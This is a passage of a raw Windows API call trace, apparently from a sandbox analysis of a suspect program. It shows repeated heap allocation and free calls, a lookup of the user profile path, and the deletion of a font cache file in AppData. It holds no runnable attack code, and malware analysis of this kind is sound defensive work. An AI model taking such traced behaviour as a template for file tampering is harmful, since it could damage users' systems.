hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0209.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0209.685] CloseHandle (hObject=0x2bc) returned 1 [0209.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0209.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0209.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0209.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0209.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0209.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0209.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0209.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0209.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0209.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0209.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0209.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0209.687] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0209.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0209.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0209.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0209.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0209.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0209.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0209.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0209.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0209.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0209.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0209.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0209.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0209.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0209.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0209.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0209.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa970 [0209.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa48 [0209.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6b8 [0209.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0209.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0209.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0209.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0209.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa538 [0209.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0209.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0209.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0209.689] CloseHandle (hObject=0x2c4) returned 1 [0209.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0209.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0209.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0209.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0209.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0209.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0209.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0209.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0209.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0209.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0209.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0209.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0209.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0209.693] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0209.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0209.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0209.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0209.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0209.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0209.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0209.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0209.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0209.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0209.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0209.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0209.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0209.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0209.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0209.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0209.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0209.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0209.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0209.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0209.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0209.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0209.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0209.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0209.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0209.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0209.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0209.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0209.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0209.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0209.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0209.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0209.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0209.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0209.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0209.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0209.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0209.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0209.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0209.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0209.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0209.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0209.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0209.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0209.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0209.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0209.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0209.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0209.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0209.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0209.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0209.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0209.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0209.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0209.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0209.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0209.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0209.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0209.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0209.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0209.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0209.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0209.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0209.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0209.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0209.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0209.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0209.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0209.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0209.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0209.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0209.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0209.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0209.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0209.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0209.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0209.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0209.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0209.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0209.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0209.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0209.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0209.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0209.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0209.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0209.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0209.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0209.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0209.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0209.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0209.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0209.700] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0209.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0209.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0209.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0209.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0209.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0209.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0209.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0209.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0209.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0209.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0209.701] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0209.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0209.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa370 [0209.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0209.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0209.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9a0 [0209.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0209.701] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0209.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0209.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0209.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0209.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0209.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0209.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0209.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0209.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0209.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0209.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0209.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0209.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0209.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0209.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0209.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0209.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0209.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0209.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0209.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0209.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0209.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0209.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0209.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0209.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0209.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0209.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0209.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x80) returned 0x24f1fe0 [0209.703] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/GDIPFONTCACHEV1.DAT", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", lpFilePart=0x8bedfc*="GDIPFONTCACHEV1.DAT") returned 0x3f [0209.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0209.703] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat")) returned 0x2020 [0209.703] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x66051ca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x66051ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9791f220, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x1a918, dwReserved0=0x1035, dwReserved1=0x4, cFileName="GDIPFONTCACHEV1.DAT", cAlternateFileName="GDIPFO~1.DAT")) returned 0xaa5660 [0209.703] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat")) returned 1 [0209.706] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x66051ca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x66051ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9791f220, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x1a918, dwReserved0=0x1035, dwReserved1=0x4, cFileName="GDIPFONTCACHEV1.DAT", cAlternateFileName="GDIPFO~1.DAT")) returned 0 [0209.706] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0209.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0209.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0209.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0209.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0209.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0209.706] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0209.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 